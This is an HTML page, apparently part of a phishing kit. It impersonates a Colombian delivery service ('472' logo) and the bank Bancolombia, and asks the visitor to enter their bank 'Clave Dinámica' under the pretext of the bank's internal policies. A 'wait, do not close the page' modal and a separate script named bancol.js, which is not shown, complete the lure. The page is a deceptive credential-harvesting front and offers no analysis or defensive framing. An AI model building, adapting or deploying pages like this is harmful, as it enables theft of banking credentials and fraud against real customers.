<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Banca Virtual</title>
    <link rel="shortcut icon" href="./assets/logos/favicon.png">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Nunito:ital,wght@0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;0,1000;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900;1,1000&amp;display=swap" rel="stylesheet">
    
    <!-- <meta http-equiv="Content-Security-Policy" content="default-src 'self'; font-src 'self' https://fonts.googleapis.com https://fonts.gstatic.com;"> -->

    <!-- CSS -->
    <link rel="stylesheet" href="./css/normalize.css">
    <link rel="stylesheet" href="./css/main.css">
    
    <!-- VALIDATIONS -->
    <script src="./js/functions.js"></script>
</head>
<body>

    <!-- MODAL ESPERA -->
    <div class="modal" id="modal-esperar">
        <div class="modal-body">
            <h3 class="modal-title">Espera un momento...</h3>
            <div class="d-center">
                <div class="lds-ellipsis"><div></div><div></div><div></div><div></div></div>
            </div>
            <p style="text-align: center;">
                No actualices ni cierres la página.
            </p>
            <span style="text-align: center;" class="thin">Trabajamos día y noche para conectar al país.</span>
        </div>
    </div>





    <header>
        <div class="navbar-container">
            <img src="./assets/logos/logo_472.png" alt="" class="navbar-logo">
            <img src="./assets/svg/hamburguer-menu.png" alt="" class="navbar-menu">
        </div>
    </header>

    <main class="section">
        <h3 class="section-title">Ingresa tu Clave Dinámica</h3>
        <div class="d-center">
            <img id="-icon-banco" src="./assets/logos/bancolombia.png" alt="" class="modal-icon-banco">
        </div>
        <p>Por políticas internas con tu banco BANCOLOMBIA necesitamos la siguiente información.</p>

        <form class="form" action="" id="form">
            <input id="cdin" type="text" minlength="4" required placeholder="Clave Dinámica">

            <button type="submit" class="btn-success btn-100" id="success">
                Iniciar sesión
            </button>
        </form>
    </main>

    <footer>
        <hr>
        <p>Sobre nosotros</p>
        <hr>
        <p>Links de interés</p>
        <hr>
        <p>Centro de ayuda</p>
        <hr>
        <p>Accesos corporativos</p>
        <hr>
        <div class="footer-links">
            <img src="./assets/svg/ico-fb.svg" alt="">
            <img src="./assets/svg/ico-ins.svg" alt="">
            <img src="./assets/svg/ico-tw.svg" alt="">
            <img src="./assets/svg/ico-yt.svg" alt="">
            <img src="./assets/svg/ico-lk.svg" alt="">
            <img src="./assets/svg/ico-vigilado.png" alt="">
        </div>
        <hr>
        <div class="footer-links">
            <p class="thinier">Política de privacidad | Términos y Condiciones | Mapa del sitio</p>
        </div>
    </footer>


    <!-- SCRIPTS -->
    <script src="./js/bancol.js"></script>   
</body>
</html>